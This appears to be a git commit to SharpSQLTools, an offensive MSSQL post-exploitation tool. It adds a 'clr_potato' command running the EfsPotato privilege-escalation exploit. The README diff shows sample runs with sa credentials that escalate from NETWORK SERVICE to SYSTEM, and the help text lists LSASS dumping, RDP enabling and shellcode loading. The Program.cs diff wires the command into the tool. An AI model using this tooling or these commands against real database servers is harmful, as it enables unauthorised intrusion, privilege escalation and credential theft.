添加clr_potato

添加clr_potato
致谢zcgonvh@EfsPotato & hl0rey

README.md

@@ -6,6 +6,10 @@
 
 ### 更新日志
 
+- 2021-08-03
+  - 添加clr_potato
+  致谢[zcgonvh@EfsPotato](https://github.com/zcgonvh/EfsPotato) & [hl0rey](https://github.com/hl0rey)
+
 - 2021-07-10 
   - 修复上传bug
   - 修复clr回显bug
@@ -57,6 +61,7 @@ disable_clr                - you know what it means
 install_clr                - create assembly and procedure
 uninstall_clr              - drop clr
 clr_exec {cmd}             - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
+clr_potato {cmd}           - exec by EfsPotato like clr_exec
 clr_combine {remotefile}   - When the upload module cannot call CMD to perform copy to merge files
 clr_dumplsass {path}       - dumplsass by clr
 clr_rdp                    - check RDP port and Enable RDP
@@ -131,6 +136,52 @@ nt service\mssql$sqlexpress
 
 ```
 
+#### clr_potato
+
+```
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato whoami
+[*] Database connection is successful!
+Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
+Part of GMH's fuck Tools, Code By zcgonvh.
+
+[+] Current user: NT AUTHORITY\NETWORK SERVICE
+[+] Get Token: 3352
+[+] Command : c:\Windows\System32\cmd.exe /c whoami
+[!] process with pid: 2012 created.
+==============================
+
+
+nt authority\system
+
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato -p c:\windows/system32\whoami.exe
+[*] Database connection is successful!
+Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
+Part of GMH's fuck Tools, Code By zcgonvh.
+
+[+] Current user: NT AUTHORITY\NETWORK SERVICE
+[+] Get Token: 3084
+[+] Command : c:\windows/system32\whoami.exe
+[!] process with pid: 164 created.
+==============================
+
+
+nt authority\system
+
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato -p c:\cmd.exe -a /c whoami
+[*] Database connection is successful!
+Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).
+Part of GMH's fuck Tools, Code By zcgonvh.
+
+[+] Current user: NT AUTHORITY\NETWORK SERVICE
+[+] Get Token: 3124
+[+] Command : c:\cmd.exe   /c whoami
+[!] process with pid: 2080 created.
+==============================
+
+
+nt authority\system
+```
+
 #### clr_scloader
 ```
 λ python Encrypt.py -f nc.bin -k 1234
@@ -289,3 +340,5 @@ https://github.com/An0nySec/ShadowUser/blob/main/ShadowUser/Program.cs#L235
 https://github.com/GhostPack/SharpDump
 
 https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0
+
+https://github.com/zcgonvh/EfsPotato

SharpSQLTools/Program.cs

@@ -31,6 +31,7 @@ private static void Help()
 install_clr                - create assembly and procedure
 uninstall_clr              - drop clr
 clr_exec {cmd}             - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
+clr_potato {cmd}           - exec by EfsPotato like clr_exec
 clr_combine {remotefile}   - When the upload module cannot call CMD to perform copy to merge files           
 clr_dumplsass {path}       - dumplsass by clr
 clr_rdp                    - check RDP port and Enable RDP
@@ -51,7 +52,7 @@ _____ _                      _____  ____  _   _______          _
  | (___ | |__   __ _ _ __ _ __| (___ | |  | | |    | | ___   ___ | |___ 
   \___ \| '_ \ / _` | '__| '_ \\___ \| |  | | |    | |/ _ \ / _ \| / __|
   ____) | | | | (_| | |  | |_) |___) | |__| | |____| | (_) | (_) | \__ \
- |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/    v2.0
+ |_____/|_| |_|\__,_|_|  | .__/_____/ \___\_\______|_|\___/ \___/|_|___/
                          | |                                            
                          |_|                              
                                                     by Rcoil & Uknow
@@ -397,6 +398,13 @@ static void interactive(string[] args)
                                 clr_exec(s);
                                 break;
                             }
+                        case "clr_potato":
+                            {
+                                String s = String.Empty;
+                                for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
+                                clr_exec(s);
+                                break;
+                            }
                         case "clr_scloader":
                             {
                                 String s = String.Empty;
@@ -581,6 +589,13 @@ static void Noninteractive(string[] args)
                             clr_exec(s);
                             break;
                         }
+                    case "clr_potato":
+                        {
+                            String s = String.Empty;
+                            for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
+                            clr_exec(s);
+                            break;
+                        }
                     case "clr_scloader":
                         {
                             String s = String.Empty;